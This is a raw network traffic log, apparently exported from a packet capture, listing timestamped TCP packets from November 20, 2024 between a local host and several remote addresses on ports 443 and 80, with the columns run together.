                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.838902950 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.838911057 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.838917971 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.838931084 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.838938951 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.838972092 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.839015007 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.841371059 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.841383934 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.841407061 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.841434002 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.841440916 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.841449022 CET4434996513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.841470957 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.841537952 CET49965443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.852591038 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.852617025 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.852631092 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.852689028 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.852715015 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.855535030 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.855590105 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.855989933 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.856034994 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.856079102 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.856097937 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.856108904 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.856127024 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.856184959 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857100010 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857131004 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857192993 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857192993 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857202053 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857264042 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857362032 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857378006 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857407093 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857412100 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857448101 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857462883 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857513905 CET4434997123.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.857547998 CET49971443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.858038902 CET4434997223.200.3.19192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.858081102 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.858345985 CET49972443192.168.2.623.200.3.19
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.858643055 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.860619068 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.860635042 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.861176968 CET49970443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.861195087 CET4434997013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.861630917 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.861630917 CET49968443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.861648083 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.861655951 CET4434996813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.885829926 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.885863066 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.886924028 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.887219906 CET49983443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.887231112 CET4434998313.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.905946970 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.905966043 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.906546116 CET49969443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.906550884 CET4434996913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.906871080 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.906883955 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.907638073 CET49973443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.907641888 CET4434997313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908276081 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908359051 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908426046 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908437967 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908447027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908462048 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908478022 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908493042 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908551931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908551931 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908552885 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908579111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908595085 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908617020 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908678055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908746004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908761024 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908776999 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908791065 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908806086 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908806086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908806086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908822060 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908871889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908871889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908871889 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908901930 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908917904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908934116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908948898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.908965111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909010887 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909010887 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909010887 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909064054 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909080982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909096956 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909110069 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909158945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909158945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909158945 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909210920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909225941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909234047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909240961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909280062 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909293890 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909310102 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909339905 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909399986 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909435034 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909451962 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909614086 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909615993 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909632921 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909646988 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909662008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909671068 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909671068 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909671068 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909677982 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909694910 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909715891 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909715891 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909715891 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909780979 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909796000 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909811020 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909816027 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909826994 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909866095 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909866095 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909953117 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909967899 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909981966 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.909996033 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910011053 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910026073 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910039902 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910052061 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910053968 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910068035 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910070896 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910172939 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910172939 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910386086 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910399914 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910413027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910430908 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910485983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910485983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910485983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910520077 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910537004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910552025 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910602093 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910712004 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910727024 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910742998 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910756111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910775900 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910775900 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910860062 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910883904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910887957 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910900116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910959959 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.910959959 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911055088 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911070108 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911082983 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911097050 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911109924 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911127090 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911132097 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911165953 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911165953 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911214113 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911233902 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911250114 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911263943 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911293983 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911294937 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911294937 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911381006 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911396980 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911411047 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911427975 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911452055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911452055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911452055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911504984 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911535025 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911550045 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911564112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911715984 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911731005 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911746025 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911767960 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911767960 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911768913 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911859989 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911870003 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911876917 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911906004 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.911952972 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912077904 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912094116 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912108898 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912125111 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912142038 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912147045 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912188053 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912188053 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912312031 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912327051 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912341118 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912357092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912372112 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912385941 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912424088 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912424088 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912424088 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912455082 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912475109 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912651062 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.912651062 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913165092 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913180113 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913194895 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913208008 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913222075 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913237095 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913249969 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913258076 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913258076 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913265944 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913281918 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913304090 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913321972 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913332939 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913332939 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913336992 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913353920 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913367987 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913383961 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913398027 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913414001 CET8049910185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913418055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913418055 CET4991080192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:41.913418055 CET4991080192.168.2.6185.215.113.206
